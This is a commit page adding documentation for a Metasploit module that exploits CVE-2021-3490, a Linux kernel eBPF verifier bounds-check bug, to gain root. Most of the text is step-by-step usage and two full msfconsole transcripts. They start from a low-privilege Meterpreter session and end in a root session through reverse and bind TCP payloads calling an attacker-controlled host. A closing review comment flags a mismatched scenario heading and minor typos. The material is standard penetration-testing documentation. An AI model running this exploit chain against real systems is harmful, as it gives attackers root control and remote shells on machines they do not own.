Add in first copy of the exploit along with the supporting source code and binaries. Documentation to come

This commit is contained in:
Grant Willcox
2021-08-17 17:19:17 -05:00
parent 3b59829c9e
commit d5df47692c
13 changed files with 1944 additions and 0 deletions
@@ -0,0 +1,284 @@
## Vulnerable Application
Linux kernels from 5.7-rc1 prior to 5.13-rc4, 5.12.4, 5.11.21, and
5.10.37 are vulnerable to a bug in the eBPF verifier's verification
of ALU32 operations in the `scalar32_min_max_and` function when performing
AND operations, whereby under certain conditions the bounds of a
32 bit register would not be properly updated.
This can be abused by attackers to conduct an out of bounds read
and write in the Linux kernel and therefore achieve arbitrary
code execution as the `root` user.
The target system must be compiled with eBPF support and not have
`kernel.unprivileged_bpf_disabled` set to `1`, which prevents unprivileged
users from loading eBPF programs into the kernel. Note that if
`kernel.unprivileged_bpf_disabled` is enabled this module can still be
utilized to bypass protections such as SELinux, however the user
must already be logged into the system as a privileged user such as `root`.
### Vulnerable Targets
Ubuntu 20.10 (Groovy Gorilla) kernels 5.8.0-25.26 through 5.8.0-52.58 and Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17
## Verification Steps
1. Start `msfconsole`
2. Gain a Linux Meterpreter shell on a target vulnerable system.
3. Do: `use exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe`
4. Do: `set session #` where the session number corresponds to the low privileged Meterpreter session you spawned earlier.
5. Do: `set LHOST <ip of your host>`
6. Do: `set LPORT <port to connect back on>`
7. Do: `exploit`
## Options
### WritableDir
A folder we can write files to. Defaults to `/tmp`
## Scenarios
### Ubuntu 21.04 (with Linux 5.11.0-16-generic)
```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set RHOST 192.168.224.221
RHOST => 192.168.224.221
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 192.168.224.221:4444
[*] Sending stage (3012548 bytes) to 192.168.224.221
[*] Meterpreter session 1 opened (192.168.224.128:41855 -> 192.168.224.221:4444) at 2021-08-17 17:37:31 -0500
meterpreter > sysinfo
Computer : 192.168.224.221
OS : Ubuntu 21.04 (Linux 5.11.0-16-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > shell
Process 4636 created.
Channel 1 created.
cat /etc/shadow
cat: /etc/shadow: Permission denied
exit
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/linux test @ ubuntu (uid=1000, gid=1000, euid=1000, 192.168.224.128:41855 -> 192.168.224.221:4444
egid=1000) @ 192.168.224.221 (192.168.224.221)
msf6 exploit(multi/handler) > use exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show options
Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.224.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Auto
msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
[*] Started reverse TCP handler on 192.168.224.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.802fke5' (39352 bytes) ...
[*] Writing '/tmp/.75mogl0Vz6' (250 bytes) ...
[*] Launching exploit ...
[*] Sending stage (3012548 bytes) to 192.168.224.221
[+] Deleted /tmp/.802fke5
[+] Deleted /tmp/.75mogl0Vz6
[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.221:42170) at 2021-08-17 17:40:19 -0500
meterpreter > sysinfo
Computer : 192.168.224.221
OS : Ubuntu 21.04 (Linux 5.11.0-16-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > background
[*] Backgrounding session 2...
smsf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/linux test @ ubuntu (uid=1000, gid=1000, euid=1000, 192.168.224.128:41855 -> 192.168.224.221:4444
egid=1000) @ 192.168.224.221 (192.168.224.221)
2 meterpreter x64/linux root @ ubuntu (uid=0, gid=0, euid=0, egid=0) 192.168.224.128:4444 -> 192.168.224.221:42170
@ 192.168.224.221 (192.168.224.221)
msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) >
```
### Ubuntu 20.04 (with Linux 4.4.0-21-generic)
```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set RHOST 192.168.224.220
RHOST => 192.168.224.220
msf6 exploit(multi/handler) > exploit
[*] Started bind TCP handler against 192.168.224.220:4444
[*] Sending stage (3012548 bytes) to 192.168.224.220
[*] Meterpreter session 1 opened (192.168.224.128:46051 -> 192.168.224.220:4444) at 2021-08-17 17:51:38 -0500
meterpreter > sysinfo
Computer : 192.168.224.220
OS : Ubuntu 20.10 (Linux 5.8.0-25-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: test @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show options
Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.224.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Auto
msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > check
[*] The target appears to be vulnerable.
msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
[*] Started reverse TCP handler on 192.168.224.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.8lHII9pIja' (39352 bytes) ...
[*] Writing '/tmp/.x3iDbm3J' (250 bytes) ...
[*] Launching exploit ...
[*] Sending stage (3012548 bytes) to 192.168.224.220
[+] Deleted /tmp/.8lHII9pIja
[+] Deleted /tmp/.x3iDbm3J
[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.220:47878) at 2021-08-17 17:53:36 -0500
meterpreter > sysinfo
Computer : 192.168.224.220
OS : Ubuntu 20.10 (Linux 5.8.0-25-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/linux test @ ubuntu (uid=1000, gid=1000, euid=1000, 192.168.224.128:46051 -> 192.168.224.220:4444
egid=1000) @ 192.168.224.220 (192.168.224.220)
2 meterpreter x64/linux root @ ubuntu (uid=0, gid=0, euid=0, egid=0) 192.168.224.128:4444 -> 192.168.224.220:47878
@ 192.168.224.220 (192.168.224.220)
msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) >
```
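Review bot: the second scenario heading `### Ubuntu 20.04 (with Linux 4.4.0-21-generic)` does not match the session it shows: `sysinfo` there reports `Ubuntu 20.10 (Linux 5.8.0-25-generic)`, and a 4.4.0 kernel is outside the 5.7-rc1 to 5.13-rc4 range given under Vulnerable Application, so the heading should read `### Ubuntu 20.10 (with Linux 5.8.0-25-generic)`, which also lines up with the Vulnerable Targets list. Smaller points in the same file: the prompt `smsf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > sessions` in the first scenario has a stray leading `s`; the standalone `check` run prints `[*] The target appears to be vulnerable.` while the automatic check during `exploit` prints the same message with `[+]`, so either the transcript or the module's check output should be made consistent; and the Options section documents `WritableDir`, but it appears in neither `show options` listing, so the docs should say where it is exposed (for example under `show advanced`, if it is an advanced option) so a reader can find and change it. In the Vulnerable Application paragraph, "when performing AND operations" repeats what the `scalar32_min_max_and` name already says and can be dropped, and the `kernel.unprivileged_bpf_disabled` sentence would be clearer stated as: when the sysctl is `1`, the module only works from a session that already runs with the privileges needed to load eBPF programs, in which case it serves to escape confinement such as SELinux rather than to escalate privilege.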